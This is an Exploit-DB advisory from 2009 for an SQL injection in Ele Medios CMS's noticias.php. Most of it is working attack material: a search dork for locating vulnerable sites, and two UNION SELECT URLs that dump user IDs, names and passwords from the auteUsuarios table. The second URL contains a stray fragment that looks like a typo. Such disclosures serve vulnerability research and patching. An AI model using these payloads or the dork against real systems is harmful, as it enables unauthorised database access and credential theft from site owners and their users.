Ele Medios CMS - SQL Injection

EDB-ID:

10418

CVE:

N/A




Platform:

PHP

Date:

2009-12-13


                                              ALGERIAN HACKER
  **********************- NORTH-AFRICA SECURITY TEAM -***********************

[!]            Ele Medios CMS SQL Injection Vulnerability
[!] Author    : Dr.0rYX and Cr3w-DZ
[!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de

***************************************************************************/

[ Software Information ]

[+] Vendor : http://www.elemedios.net/
[+] script   : Ele Medios CMS
[+] Download : http://www.elemedios.net/
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"noticias.php?notiId="

**************************************************************************/
[ Vulnerable File ]

http://server/noticias.php?notiId=[N.A.S.T ]

[ Exploit ]

http://server/noticias.php?notiId=-1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+from+auteUsuarios

http://server/noticias.php?notiId=-1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+8+from+auteUsuarios

[  GReets ]

[+] :claw , le0n , exploit-db.com , ALL HACKERS MUSLIMS